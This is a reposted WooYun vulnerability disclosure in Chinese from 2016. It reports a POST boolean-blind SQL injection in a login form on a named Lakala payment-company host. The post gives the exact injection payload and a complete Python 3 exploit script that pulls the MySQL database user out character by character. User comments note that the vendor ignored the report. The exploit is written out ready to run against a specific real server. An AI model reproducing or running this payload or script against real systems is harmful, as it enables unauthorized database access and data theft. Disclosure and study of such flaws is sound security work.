拉卡拉某站依旧存在POST bool blind(附python 3验证脚本)

admin
admin
admin
139543
文章
114
评论
2017年4月17日02:39:18评论417 views字数 253阅读0分50秒阅读模式
摘要

2016-04-05: 细节已通知厂商并且等待厂商处理中
2016-04-05: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-10: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(14) 关注此漏洞

缺陷编号: WooYun-2016-191820

漏洞标题: 拉卡拉某站依旧存在POST bool blind(附python 3验证脚本)

相关厂商: 拉卡拉网络技术有限公司

漏洞作者: 路人甲

提交时间: 2016-04-05 16:57

公开时间: 2016-04-10 17:00

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: Mysql POST blind bool

8人收藏

漏洞详情

披露状态:

2016-04-05: 细节已通知厂商并且等待厂商处理中
2016-04-05: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

拉卡拉某站依旧存在POST bool blind(附python 3验证脚本)

详细说明:

最近在研究POC以及EXP的编写,学习lijiejie大牛的漏洞时,由于lijiejie的脚本都在python 2.x环境中,想在python 3学习,需要修改下代码

手动修改时,发现这个漏洞 WooYun: 拉卡拉某站点存在MySQL注射(附验证脚本) 已经公开了一年多

但是却依然没有修复,厂商还是乌云注册厂商

注入方式:POST http://jzlq.lakala.com:7070/pos/index.php?action=login

提交数据:

captcha_keystring=1&password_login=&password_login_show=&username=aa"XOR(if(length(user())=15,1,0))OR"bb

code 区域 
MySQL user is

拉卡拉某站依旧存在POST bool blind(附python 3验证脚本)

漏洞证明:

EXP(python 3.4):

code 区域 
# -*- coding:utf-8 -*-
 import http.client
 import time
 import string
 import sys
 import random
 import urllib.request
 import urllib.parse
 import urllib
 
 headers = {'Content-Type': 'application/x-www-form-urlencoded'}
 payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
 
 print("Start to retrive MySQL User:/n")
 
 user = ''
 
 for i in range(1, 16):
     for payload in payloads:
         sys.stdout.write('.')
         sys.stdout.flush()
         conn = http.client.HTTPConnection('jzlq.lakala.com:7070', timeout=3)
         s = 'aa"XOR(if(ascii(mid(user()from(%s)for(1)))=%s,1,0))OR"bb' % (i, ord(payload))
         conn.request(method='POST',
                      url='/pos/index.php?action=login',
                      body='aptcha_keystring=&password_login=&password_login_show=&username=' + urllib.parse.quote(s),
                      headers=headers)
         html_doc = conn.getresponse().read().decode('utf-8')
         conn.close()
         if html_doc.find(u'请输入新密码') > 0:
             user += payload
             print('/r[In Progress]' + user)
             break
 
 print("/n[Done]MySQL user is %s" % user)

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-04-10 17:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-11 12:55 | ArcticWolf ( 普通白帽子 | Rank:112 漏洞数:34 | 呃···是AW!不是AV!)

    1

    这样不算重复提交吗,,,,多谢poc

  2. 2016-04-11 18:03 | 疯狗 拉卡拉某站依旧存在POST bool blind(附python 3验证脚本) ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    1

    又忽略

  3. 2016-04-16 01:42 | Freebug ( 普通白帽子 | Rank:110 漏洞数:39 | 流氓是一种高尚的职业!)

    1

    无悬念,忽略~

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin